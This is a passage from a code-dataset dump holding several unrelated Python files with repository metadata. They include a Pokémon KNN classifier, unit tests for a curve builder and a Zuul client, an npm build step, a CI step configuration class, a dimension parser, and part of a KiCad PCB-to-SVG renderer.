] | 2 | 2018-01-14T06:14:44.000Z | 2018-01-15T15:35:07.000Z | Pokemon/LegendaryPokemonKNN.py | pranavj1001/MachineLearningRecipes | 513e24ba0b5a8994158131cb0c84e779eee78c68 | [
"MIT"
] | null | null | null | Pokemon/LegendaryPokemonKNN.py | pranavj1001/MachineLearningRecipes | 513e24ba0b5a8994158131cb0c84e779eee78c68 | [
"MIT"
] | 2 | 2019-06-10T09:01:20.000Z | 2019-12-05T01:10:48.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 24 23:08:26 2017
@author: pranavjain
This model classifies a pokemon as legendary or not-legendary.
Required Data to predict Hit Points, Attack Points, Defence Points, Special Attack Points, Special Defence Points, Speed Points
"""
# import libraries
import pandas as pd
import numpy as np
# get data from the dataset
dataset = pd.read_csv('Pokemon.csv')
X = dataset.iloc[:, [5,6,7,8,9,10]].values
y = dataset.iloc[:, 12].values
# NOTE: reshape returns a new array; the result is discarded, so y stays 1-D
# (which is the shape LabelEncoder expects)
y.reshape(-1, 1)
# Label Encode the y set
# False -> 0
# True -> 1
from sklearn.preprocessing import LabelEncoder
labelEncoder_y = LabelEncoder()
y = labelEncoder_y.fit_transform(y)
# Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 0)
# Feature Scaling
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
# Fitting K-NN to the Training set
from sklearn.neighbors import KNeighborsClassifier
classifier = KNeighborsClassifier(n_neighbors = 5, metric = 'minkowski', p = 2)
classifier.fit(X_train, y_train)
# predict our test results
y_pred = classifier.predict(X_test)
# to calculate the number of results that we got wrong
# eg. here we predicted only 15 wrong out of 200
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)
# predict for custom values
# Arguments(Hit Points, Attack Points, Defence Points, Special Attack Points, Special Defence Points, Speed Points)
test = np.matrix('106 190 100 154 100 130')
test =sc.transform(test)
pred = classifier.predict(test)
| 30.949153 | 127 | 0.766703 | 288 | 1,826 | 4.760417 | 0.482639 | 0.040117 | 0.021882 | 0.030635 | 0.122538 | 0.122538 | 0.122538 | 0.122538 | 0.122538 | 0.122538 | 0 | 0.036492 | 0.144578 | 1,826 | 58 | 128 | 31.482759 | 0.841229 | 0.451807 | 0 | 0 | 0 | 0 | 0.044012 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.291667 | 0 | 0.291667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f675b2a5f4cdacd4a31a0ac2238ec1c5c5d23ed6 | 4,392 | py | Python | test/test_builder.py | equinor/curvy | 791a2202f02fd0c86797d7052deeca50333e66f6 | [
"MIT"
] | 3 | 2021-03-17T01:00:50.000Z | 2021-06-20T03:17:50.000Z | test/test_builder.py | Statoil/curvy | 791a2202f02fd0c86797d7052deeca50333e66f6 | [
"MIT"
] | 1 | 2022-02-11T16:57:29.000Z | 2022-02-13T19:56:59.000Z | test/test_builder.py | Statoil/curvy | 791a2202f02fd0c86797d7052deeca50333e66f6 | [
"MIT"
] | 3 | 2019-03-11T12:17:03.000Z | 2022-02-15T03:37:27.000Z | import unittest
from curvy import builder, axis
import datetime
import numpy as np
taus = [[2,5],[5,7],[7,11]]
prices = [3,5,4]
knots = [5,7]
class TestBuilderMethods(unittest.TestCase):
def test_calc_H(self):
H = np.load('test/test_files/H.npy')
np.testing.assert_array_equal(
builder.calc_H(2, 5),
H
)
def test_calc_big_H(self):
big_H = np.load('test/test_files/big_H.npy')
np.testing.assert_array_equal(
builder.calc_big_H(taus),
big_H
)
def test_avg_constraint(self):
avg_constraint = np.load('test/test_files/avg_constraint.npy')
np.testing.assert_array_equal(
builder.calc_avg_constraint(2,5),
avg_constraint
)
def test_calc_constraints(self):
constraints = np.load('test/test_files/constraints.npy')
np.testing.assert_array_equal(
builder.calc_constraints(5),
constraints
)
def test_calc_big_A(self):
big_A = np.load('test/test_files/big_A.npy')
np.testing.assert_array_equal(
builder.calc_big_A(knots, taus),
big_A
)
def test_calc_B(self):
B = np.load('test/test_files/B.npy')
np.testing.assert_array_equal(
builder.calc_B(prices, taus),
B
)
def test_solve_lineq(self):
lineq_ans = np.load('test/test_files/lineq_ans.npy')
lineq_ans = [arr for arr in lineq_ans]
np.testing.assert_array_almost_equal(
builder.solve_lineq(
builder.calc_big_H(taus),
builder.calc_big_A(knots, taus),
builder.calc_B(prices, taus)
),
lineq_ans
)
lineq_ans_no_split = np.load('test/test_files/lineq_ans_no_split.npy')
np.testing.assert_array_almost_equal(
builder.solve_lineq(
builder.calc_big_H(taus),
builder.calc_big_A(knots, taus),
builder.calc_B(prices, taus),
split=False
),
lineq_ans_no_split
)
def test_smfc(self):
self.assertEqual(
builder.smfc(2, [2,3,4,5,6]),
88
)
self.assertEqual(
builder.smfc(11, [5,2,9,5,4]),
77015
)
def test_curve_values(self):
curve_values = np.load('test/test_files/curve_values.npy')
curve_values_flat = np.load('test/test_files/curve_values_flat.npy')
H = builder.calc_big_H(taus)
A = builder.calc_big_A(knots, taus)
B = builder.calc_B(prices, taus)
X = builder.solve_lineq(H, A, B)
np.testing.assert_array_almost_equal(
builder.curve_values(taus, X, builder.smfc),
curve_values
)
np.testing.assert_array_almost_equal(
builder.curve_values(taus, X, builder.smfc, flatten=True),
curve_values_flat
)
def test_calc_smfc(self):
prices2 = [2,4,7,5,4,3,2]
dr = axis.date_ranges(datetime.datetime(2018,11,26), 5)
curve_values = np.load('test/test_files/curve_values2.npy')
curve_values_flat = np.load('test/test_files/curve_values2_no_flat.npy').tolist()
np.testing.assert_array_almost_equal(
builder.calc_smfc(dr, prices2),
curve_values
)
test_curve_values = builder.calc_smfc(dr, prices2, flatten=False)
        for i in range(len(test_curve_values)):
np.testing.assert_array_almost_equal(test_curve_values[i], curve_values_flat[i])
#### This one might be harder to test
#
# def test_build_smfc_curve(self):
# curve_values = np.load('test/test_files/curve_values3.npy')
# curve_values_flat = np.load('test/test_files/curve_values3_no_flat.npy')
# test_curve_values = builder.build_smfc_curve(
# prices,
# start_date=datetime.datetime(2018,11,26)
# )
# test_curve_values_no_flat = builder.build_smfc_curve(
# prices,
# start_date=datetime.datetime(2018,11,26),
# flatten=False
# )
# for i in len(curve_values):
# np.testing.assert_array_equal(
# curve_values
# )
if __name__ == '__main__':
unittest.main() | 30.289655 | 92 | 0.589936 | 575 | 4,392 | 4.194783 | 0.149565 | 0.100332 | 0.058043 | 0.08126 | 0.619818 | 0.527363 | 0.473466 | 0.41874 | 0.333748 | 0.249585 | 0 | 0.025147 | 0.302823 | 4,392 | 145 | 93 | 30.289655 | 0.762573 | 0.133424 | 0 | 0.262136 | 0 | 0 | 0.099075 | 0.096962 | 0 | 0 | 0 | 0 | 0.135922 | 1 | 0.097087 | false | 0 | 0.038835 | 0 | 0.145631 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f67699a54e5a98e0d273159f57f639b8fe6cfffb | 2,091 | py | Python | steps/make/npm.py | flipcoder/siege-tools | df8a9fa5a4a6f2bcce4789cebe17b0c4dd3f7e60 | [
"MIT"
] | 6 | 2015-08-14T15:26:38.000Z | 2019-11-14T01:08:31.000Z | steps/make/npm.py | flipcoder/siege-tools | df8a9fa5a4a6f2bcce4789cebe17b0c4dd3f7e60 | [
"MIT"
] | null | null | null | steps/make/npm.py | flipcoder/siege-tools | df8a9fa5a4a6f2bcce4789cebe17b0c4dd3f7e60 | [
"MIT"
] | 1 | 2019-05-10T04:52:40.000Z | 2019-05-10T04:52:40.000Z | #!/usr/bin/env python
import os
import sgmake
import subprocess
import json
from common import Status
from common import Settings
from common import Support
from common import call
def make(project):
try:
project.npmpath = os.path.abspath(os.path.expanduser(Settings.get('npm_path')))
except:
project.npmpath = ""
if os.path.isfile("package.json.ls") or os.path.isfile("package.lson"):
try:
project.lscpath = os.path.abspath(os.path.expanduser(Settings.get('lsc_path')))
except:
project.lscpath = ""
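        # package.json.ls / package.lson are LiveScript sources; lsc compiles
        # them into a plain package.json before npm install runs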
        if os.path.isfile("package.json.ls"):
lscmd = [
os.path.join(project.lscpath,"lsc"),
"-jc", "package.json.ls"
]
elif os.path.isfile("package.lson"):
lscmd = [
os.path.join(project.lscpath,"lsc"),
"-jc", "package.lson"
]
try:
call(lscmd)
except subprocess.CalledProcessError:
return Status.FAILURE
#try:
# project.npm_params
#except:
# project.npm_params = []
cmdline = [os.path.join(project.npmpath,"npm"), "install"]
#if project.npm_params:
# cmdline += project.npm_params
#print " ".join(cmdline)
try:
call(cmdline)
except subprocess.CalledProcessError:
return Status.FAILURE
return Status.SUCCESS
#def update(project):
#if os.path.isfile("package.json.ls") or os.path.isfile("package.lson"):
# # remove temp generated package.json
# project.clean += ['package.json']
# pass
def compatible(project):
support = Support.ENVIRONMENT | Support.USER | Support.AUTO
    if os.path.isfile("package.json") or \
       os.path.isfile("package.json.ls") or \
       os.path.isfile("package.lson"):
        # only inspect package.json when it actually exists; with only the
        # LiveScript/LSON sources present there is nothing to parse yet
        if os.path.isfile("package.json"):
            with open('package.json') as f:
                j = json.load(f)
            if not (u'engines' in j and u'yarn' in j[u'engines'].keys()):
                support |= Support.PROJECT
        else:
            support |= Support.PROJECT
return support
| 27.155844 | 91 | 0.573888 | 242 | 2,091 | 4.933884 | 0.285124 | 0.080402 | 0.090452 | 0.143216 | 0.417923 | 0.396985 | 0.28727 | 0.264657 | 0.197655 | 0.128978 | 0 | 0 | 0.297944 | 2,091 | 76 | 92 | 27.513158 | 0.813352 | 0.159254 | 0 | 0.291667 | 0 | 0 | 0.10786 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.166667 | 0 | 0.291667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f67772509b463ffdb32e8b1ff18b59f81eb3ecda | 2,674 | py | Python | tests/sources/zuul/test_api.py | bregman-arie/cibyl | 41132c1cb885f3306fe6aff59225cfafb6563207 | [
"Apache-2.0"
] | null | null | null | tests/sources/zuul/test_api.py | bregman-arie/cibyl | 41132c1cb885f3306fe6aff59225cfafb6563207 | [
"Apache-2.0"
] | null | null | null | tests/sources/zuul/test_api.py | bregman-arie/cibyl | 41132c1cb885f3306fe6aff59225cfafb6563207 | [
"Apache-2.0"
] | null | null | null | """
# Copyright 2022 Red Hat
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
from unittest import TestCase
from unittest.mock import Mock, PropertyMock
from cibyl.sources.zuul.api import ZuulAPI, ZuulAPIError, safe_request
class TestSafeRequest(TestCase):
"""Tests for :func:`safe_request`.
"""
def test_wraps_errors(self):
"""Tests that errors coming out of the call are wrapped around the
API's error type.
"""
@safe_request
def request():
raise Exception
self.assertRaises(ZuulAPIError, request)
def test_returns_result_when_no_error(self):
"""Tests that the call's output is returned when everything goes right.
"""
result = {'some_key': 'some_value'}
@safe_request
def request():
return result
self.assertEqual(result, request())
class TestZuulAPIFromUrl(TestCase):
"""Tests for :meth:`ZuulAPI.from_url`.
"""
def test_with_all_args(self):
"""Checks that the object is built correctly when all arguments are
provided.
"""
url = 'url/to/zuul/'
cert = 'path/to/cert.pem'
auth_token = 'token'
api = ZuulAPI.from_url(url, cert, auth_token)
self.assertEqual(url, api.url)
self.assertEqual(cert, api.cert)
self.assertEqual(auth_token, api.auth_token)
def test_with_no_cert(self):
"""Checks that object is built correctly when the certificate is not
provided.
"""
url = 'url/to/zuul/'
cert = None
auth_token = 'token'
api = ZuulAPI.from_url(url, cert, auth_token)
self.assertEqual(url, api.url)
self.assertEqual(None, api.cert)
self.assertEqual(auth_token, api.auth_token)
class TestZuulAPI(TestCase):
"""Tests for :class:`ZuulAPI`.
"""
def test_info(self):
"""Tests that the correct info from :meth:`ZuulAPI.info` is
retrieved.
"""
client = Mock()
client.info = PropertyMock()
api = ZuulAPI(client)
self.assertEqual(client.info, api.info())
| 27.854167 | 79 | 0.636874 | 336 | 2,674 | 4.97619 | 0.404762 | 0.07177 | 0.028708 | 0.019139 | 0.214115 | 0.183014 | 0.154306 | 0.154306 | 0.154306 | 0.102871 | 0 | 0.004073 | 0.26552 | 2,674 | 95 | 80 | 28.147368 | 0.847251 | 0.408003 | 0 | 0.368421 | 0 | 0 | 0.046353 | 0 | 0 | 0 | 0 | 0 | 0.236842 | 1 | 0.184211 | false | 0 | 0.078947 | 0.026316 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f67860e5e860f7dd53b1e0dfd7d2593031b44100 | 3,735 | py | Python | src/cihpc/core/structures/project_step.py | janhybs/ci-hpi | 293740c7af62ecada5744ff663266de2e3d37445 | [
"MIT"
] | 1 | 2020-01-09T13:00:18.000Z | 2020-01-09T13:00:18.000Z | src/cihpc/core/structures/project_step.py | janhybs/ci-hpi | 293740c7af62ecada5744ff663266de2e3d37445 | [
"MIT"
] | null | null | null | src/cihpc/core/structures/project_step.py | janhybs/ci-hpi | 293740c7af62ecada5744ff663266de2e3d37445 | [
"MIT"
] | 2 | 2018-08-12T01:13:28.000Z | 2018-08-13T14:37:28.000Z | #!/usr/bin/python
# author: Jan Hybs
import cihpc.core.structures as structures_init
from cihpc.cfg.config import global_configuration
from cihpc.core.structures.project_step_collect import ProjectStepCollect
from cihpc.core.structures.project_step_container import ProjectStepContainer
from cihpc.core.structures.project_step_git import ProjectStepGit
from cihpc.core.structures.project_step_measure import ProjectStepMeasure
from cihpc.core.structures.project_step_parallel import ProjectStepParallel
from cihpc.core.structures.project_step_repeat import ProjectStepRepeat
from cihpc.core.structures.project_step_cache import ProjectStepCache
class ProjectStep(object):
"""
Class representing single step in a project
:type section: cihpc.core.structures.project_section.ProjectSection
:type git: list[ProjectStepGit]
:type description: str
:type enabled: bool
:type verbose: bool
:type container: cihpc.core.structures.project_step_container.ProjectStepContainer
:type smart_repeat: cihpc.core.structures.project_step_repeat.ProjectStepRepeat
:type repeat: int
:type shell: str
:type output: str
:type variables: list
:type measure: from cihpc.core.structures.project_step_measure.ProjectStepMeasure
:type collect: cihpc.core.structures.project_step_collectProjectStepCollect
:type parallel: cihpc.core.structures.project_step_parallel.ProjectStepParallel
:type cache: cihpc.core.structures.project_step_cache.ProjectStepCache
"""
def __init__(self, section, **kwargs):
self.name = kwargs['name']
self.git = [ProjectStepGit(**x) for x in kwargs.get('git', [])]
self.description = kwargs.get('description', [])
self.enabled = kwargs.get('enabled', True)
self.verbose = structures_init.pick(kwargs, False, 'verbose', 'debug')
self.container = structures_init.new(kwargs, 'container', ProjectStepContainer)
self.smart_repeat = ProjectStepRepeat(kwargs.get('repeat', 1))
self.shell = kwargs.get('shell', None)
self.parallel = ProjectStepParallel(kwargs.get('parallel', dict()))
self.cache = ProjectStepCache(kwargs.get('cache', dict()))
# available choices are
# stdout - live output to the stdout
# log - redirects to the log file
# log+stdout - redirect output to temp file, and after the subprocess
# has ended, print out to stdout and append to file
# stdout+log - same as above
# null - redirects to /dev/null, note that in config.yaml
# the value must be 'null' instead of null
self.output = kwargs.get(
'output',
'stdout' if global_configuration.tty else 'log+stdout'
)
# build matrix
self.variables = kwargs.get('variables', [])
# artifact generation
self.measure = structures_init.new(kwargs, 'measure', ProjectStepMeasure)
# artifact collection
self.collect = structures_init.new(kwargs, 'collect', ProjectStepCollect)
# project section
self.section = section
# save raw configuration
self.raw_config = kwargs
# if git repos were set, the first one is taken as
# a project main git repository
if self.git:
global_configuration.project_git = self.git[0]
@property
def ord_name(self):
return '%d.%s' % (self.section.steps.index(self) + 1, self.name)
@property
def repeat(self):
return self.smart_repeat.value
| 41.966292 | 94 | 0.668273 | 418 | 3,735 | 5.863636 | 0.308612 | 0.05508 | 0.116279 | 0.148511 | 0.200734 | 0.188494 | 0.033456 | 0 | 0 | 0 | 0 | 0.001065 | 0.246051 | 3,735 | 88 | 95 | 42.443182 | 0.869318 | 0.398126 | 0 | 0.052632 | 0 | 0 | 0.055659 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078947 | false | 0 | 0.236842 | 0.052632 | 0.394737 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f678eb53ea8b81db409d272313d26c5cd3f11ca6 | 3,747 | py | Python | maha/parsers/functions/parse_dimensions.py | MuhammadAlBarham/Maha | c28e0b7ca69942905548f013a1e35208ef8de7e7 | [
"BSD-3-Clause"
] | 1 | 2021-11-02T08:25:12.000Z | 2021-11-02T08:25:12.000Z | maha/parsers/functions/parse_dimensions.py | vikrambala/Maha | 67020437e745b8fca4770186608326b81073d4b7 | [
"BSD-3-Clause"
] | null | null | null | maha/parsers/functions/parse_dimensions.py | vikrambala/Maha | 67020437e745b8fca4770186608326b81073d4b7 | [
"BSD-3-Clause"
] | null | null | null | __all__ = ["parse_dimension"]
from typing import List
from maha.parsers.rules import (
RULE_DURATION,
RULE_NAME,
RULE_NUMERAL,
RULE_ORDINAL,
RULE_TIME,
)
from maha.parsers.templates import Dimension, DimensionType
from maha.rexy import Expression
def parse_dimension(
text: str,
amount_of_money: bool = None,
duration: bool = None,
distance: bool = None,
numeral: bool = None,
ordinal: bool = None,
quantity: bool = None,
temperature: bool = None,
time: bool = None,
volume: bool = None,
names: bool = None,
) -> List[Dimension]:
"""Extract dimensions from a given text.
Parameters
----------
text : str
Text to extract dimensions from
amount_of_money : bool, optional
Extract amount of money using the rule :data:`~.RULE_AMOUNT_OF_MONEY`,
by default None
duration : bool, optional
Extract duration using the rule :data:`~.RULE_DURATION`,
by default None
distance : bool, optional
Extract distance using the rule :data:`~.RULE_DISTANCE`,
by default None
numeral : bool, optional
Extract numeral using the rule :data:`~.RULE_NUMERAL`,
by default None
ordinal : bool, optional
Extract ordinal using the rule :data:`~.RULE_ORDINAL`,
by default None
quantity : bool, optional
Extract quantity using the rule :data:`~.RULE_QUANTITY`,
by default None
temperature : bool, optional
Extract temperature using the rule :data:`~.RULE_TEMPERATURE`,
by default None
time : bool, optional
Extract time using the rule :data:`~.RULE_TIME`,
by default None
volume : bool, optional
Extract volume using the rule :data:`~.RULE_VOLUME`,
by default None
Returns
-------
List[:class:`~.Dimension`]
List of :class:`~.Dimension` objects extracted from the text
Raises
------
ValueError
If no argument is set to True
"""
output = []
if amount_of_money:
raise NotImplementedError("amount_of_money is not implemented yet")
if duration:
output.extend(_get_dimensions(RULE_DURATION, text, DimensionType.DURATION))
if distance:
raise NotImplementedError("distance is not implemented yet")
if numeral:
output.extend(_get_dimensions(RULE_NUMERAL, text, DimensionType.NUMERAL))
if ordinal:
output.extend(_get_dimensions(RULE_ORDINAL, text, DimensionType.ORDINAL))
if quantity:
raise NotImplementedError("quantity is not implemented yet")
if temperature:
raise NotImplementedError("temperature is not implemented yet")
if time:
output.extend(_get_dimensions(RULE_TIME, text, DimensionType.TIME))
if volume:
raise NotImplementedError("volume is not implemented yet")
if names:
output.extend(_get_dimensions(RULE_NAME, text, DimensionType.NAME))
if not any(
[
amount_of_money,
duration,
distance,
numeral,
ordinal,
quantity,
temperature,
time,
volume,
names,
]
):
raise ValueError("At least one argument should be True")
return output
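
# A hedged usage sketch -- the input text and the printed attribute names are
# illustrative, not taken from this module:
#
#     dims = parse_dimension(some_text, time=True, numeral=True)
#     for dim in dims:
#         print(dim.dimension_type, dim.value, dim.start, dim.end)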
def _get_dimensions(
rule: Expression, text: str, dimension_type: DimensionType
) -> List[Dimension]:
output = []
for result in rule(text):
output.append(
Dimension(
result.expression,
text[result.start : result.end],
result.value,
result.start,
result.end,
dimension_type,
)
)
return output
| 28.603053 | 83 | 0.619696 | 410 | 3,747 | 5.539024 | 0.195122 | 0.035227 | 0.075297 | 0.063408 | 0.189344 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.296771 | 3,747 | 130 | 84 | 28.823077 | 0.86186 | 0.332266 | 0 | 0.077922 | 0 | 0 | 0.091649 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025974 | false | 0 | 0.051948 | 0 | 0.103896 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f679aca9364b8dc5091f23223316413bce1eb328 | 16,854 | py | Python | pcbdraw.py | Gasman2014/PcbDraw | 06920b8676a1a6f9d585111769b4785e9b7687fc | [
"MIT"
] | 1 | 2019-04-04T09:36:28.000Z | 2019-04-04T09:36:28.000Z | pcbdraw.py | arturo182/PcbDraw | 06920b8676a1a6f9d585111769b4785e9b7687fc | [
"MIT"
] | null | null | null | pcbdraw.py | arturo182/PcbDraw | 06920b8676a1a6f9d585111769b4785e9b7687fc | [
"MIT"
] | 1 | 2018-10-16T02:16:27.000Z | 2018-10-16T02:16:27.000Z | #!/usr/bin/env python
import argparse
import json
import math
import os
import re
import shutil
import sys
import tempfile
import pcbnew
from lxml import etree
default_style = {
"copper": "#417e5a",
"board": "#4ca06c",
"silk": "#f0f0f0",
"pads": "#b5ae30",
"outline": "#000000"
}
class SvgPathItem:
def __init__(self, path):
path = re.sub(r"([MLA])(\d+)", r"\1 \2", path)
path = re.split("[, ]", path)
        path = list(filter(lambda x: x, path))
if path[0] != "M":
raise SyntaxError("Only paths with absolute position are supported")
self.start = tuple(map(float, path[1:3]))
path = path[3:]
if path[0] == "L":
x = float(path[1])
y = float(path[2])
self.end = (x, y)
self.type = path[0]
self.args = None
elif path[0] == "A":
            args = list(map(float, path[1:8]))
self.end = (args[5], args[6])
self.args = args[0:5]
self.type = path[0]
else:
raise SyntaxError("Unsupported path element " + path[0])
@staticmethod
def is_same(p1, p2):
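        # endpoints within 5 plot units of each other count as coincident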
dx = p1[0] - p2[0]
dy = p1[1] - p2[1]
return math.sqrt(dx*dx+dy*dy) < 5
def format(self, first):
ret = ""
if first:
ret += " M {} {} ".format(*self.start)
ret += self.type
if self.args:
ret += " " + " ".join(map(lambda x: str(x).rstrip('0').rstrip('.'), self.args))
ret += " {} {} ".format(*self.end)
return ret
def flip(self):
self.start, self.end = self.end, self.start
if self.type == "A":
self.args[4] = 1 if self.args[4] < 0.5 else 0
def unique_prefix():
unique_prefix.counter += 1
return "pref_" + str(unique_prefix.counter)
unique_prefix.counter = 0
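
# KiCad's internal units are nanometres; one decimil (0.1 mil) is 2540 nm,
# hence the divisor below.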
def ki2dmil(val):
return val / 2540
def extract_svg_content(filename):
prefix = unique_prefix() + "_"
root = etree.parse(filename).getroot()
# We have to ensure all Ids in SVG are unique. Let's make it nasty by
# collecting all ids and doing search & replace
# Potentially dangerous (can break user text)
ids = []
for el in root.getiterator():
if "id" in el.attrib and el.attrib["id"] != "origin":
ids.append(el.attrib["id"])
with open(filename) as f:
content = f.read()
for i in ids:
content = content.replace("#"+i, "#" + prefix + i)
root = etree.fromstring(content)
# Remove SVG namespace to ease our lifes and change ids
for el in root.getiterator():
if "id" in el.attrib and el.attrib["id"] != "origin":
el.attrib["id"] = prefix + el.attrib["id"]
if '}' in str(el.tag):
el.tag = el.tag.split('}', 1)[1]
return [ x for x in root if x.tag and x.tag not in ["title", "desc"]]
def strip_fill_svg(root):
keys = ["fill", "stroke"]
for el in root.getiterator():
if "style" in el.attrib:
s = el.attrib["style"].split(";")
s = filter(lambda x: x.strip().split(":")[0] not in keys, s)
el.attrib["style"] = ";".join(s).replace(" ", " ").strip()
def empty_svg(**attrs):
document = etree.ElementTree(etree.fromstring(
"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1"
width="29.7002cm" height="21.0007cm" viewBox="0 0 116930 82680 ">
    <title>Picture generated by pcb2svg</title>
<desc>Picture generated by pcb2svg</desc>
</svg>"""))
root = document.getroot()
for key, value in attrs.items():
root.attrib[key] = value
return document
def get_board_polygon(svg_elements):
"""
    Try to connect independent segments on Edge.Cuts into a closed polygon.
    Returns an SVG path element with the polygon.
"""
elements = []
path = ""
for group in svg_elements:
for svg_element in group:
if svg_element.tag == "path":
elements.append(SvgPathItem(svg_element.attrib["d"]))
elif svg_element.tag == "circle":
# Convert circle to path
att = svg_element.attrib
s = " M {0} {1} m-{2} 0 a {2} {2} 0 1 0 {3} 0 a {2} {2} 0 1 0 -{3} 0 ".format(
att["cx"], att["cy"], att["r"], 2 * float(att["r"]))
path += s
outline = [elements[0]]
elements = elements[1:]
while True:
size = len(outline)
for i, e in enumerate(elements):
if SvgPathItem.is_same(outline[0].start, e.end):
outline.insert(0, e)
elif SvgPathItem.is_same(outline[0].start, e.start):
e.flip()
outline.insert(0, e)
elif SvgPathItem.is_same(outline[-1].end, e.start):
outline.append(e)
elif SvgPathItem.is_same(outline[-1].end, e.end):
e.flip()
outline.append(e)
else:
continue
del elements[i]
break
if size == len(outline):
first = True
for x in outline:
path += x.format(first)
first = False
if elements:
outline = [elements[0]]
elements = elements[1:]
else:
e = etree.Element("path", d=path, style="fill-rule=evenodd;")
return e
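# The loop above greedily grows the current outline chain: each pass looks for
# a remaining segment whose endpoint matches either end of the chain (flipping
# the segment when its direction is reversed). When a full pass adds nothing,
# the chain is flushed into the path and a new chain is started from any
# leftover segments, so disconnected outlines (e.g. inner cutouts) still work.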
def process_board_substrate_layer(container, name, source, colors):
    layer = etree.SubElement(container, "g", id="substrate-"+name,
                             style="fill:{0}; stroke:{0};".format(colors[name]))
    if name == "pads":
        layer.attrib["mask"] = "url(#pads-mask)"
    for element in extract_svg_content(source):
        strip_fill_svg(element)
        layer.append(element)

def process_board_substrate_base(container, name, source, colors):
    clipPath = etree.SubElement(etree.SubElement(container, "defs"), "clipPath")
    clipPath.attrib["id"] = "cut-off"
    clipPath.append(get_board_polygon(extract_svg_content(source)))
    layer = etree.SubElement(container, "g", id="substrate-"+name,
                             style="fill:{0}; stroke:{0};".format(colors[name]))
    layer.append(get_board_polygon(extract_svg_content(source)))
    outline = etree.SubElement(layer, "g",
                               style="fill:{0}; stroke: {0};".format(colors["outline"]))
    for element in extract_svg_content(source):
        strip_fill_svg(element)
        outline.append(element)

def process_board_substrate_mask(container, name, source, colors):
    mask = etree.SubElement(etree.SubElement(container, "defs"), "mask")
    mask.attrib["id"] = name
    for element in extract_svg_content(source):
        for item in element.getiterator():
            if "style" in item.attrib:
                # KiCAD plots in black, for mask we need white
                item.attrib["style"] = item.attrib["style"].replace("#000000", "#ffffff")
        mask.append(element)
def get_board_substrate(board, colors, holes):
    """
    Plots all front layers from the board and arranges them in a visually appealing style.
    return SVG g element with the board substrate
    """
    toPlot = [
        ("board", [pcbnew.Edge_Cuts], process_board_substrate_base),
        ("copper", [pcbnew.F_Cu], process_board_substrate_layer),
        ("pads", [pcbnew.F_Cu], process_board_substrate_layer),
        ("pads-mask", [pcbnew.F_Mask], process_board_substrate_mask),
        ("silk", [pcbnew.F_SilkS], process_board_substrate_layer),
        ("outline", [pcbnew.Edge_Cuts], process_board_substrate_layer)]
    container = etree.Element('g')
    container.attrib["clip-path"] = "url(#cut-off)"
    tmp = tempfile.mkdtemp()
    pctl = pcbnew.PLOT_CONTROLLER(board)
    popt = pctl.GetPlotOptions()
    popt.SetOutputDirectory(tmp)
    popt.SetScale(1)
    popt.SetMirror(False)
    try:
        popt.SetPlotOutlineMode(False)
    except AttributeError:
        # Method does not exist in older versions of KiCad
        pass
    popt.SetTextMode(pcbnew.PLOTTEXTMODE_STROKE)
    for f, layers, _ in toPlot:
        pctl.OpenPlotfile(f, pcbnew.PLOT_FORMAT_SVG, f)
        for l in layers:
            pctl.SetColorMode(False)
            pctl.SetLayer(l)
            pctl.PlotLayer()
        pctl.ClosePlot()
    for f, _, process in toPlot:
        for svg_file in os.listdir(tmp):
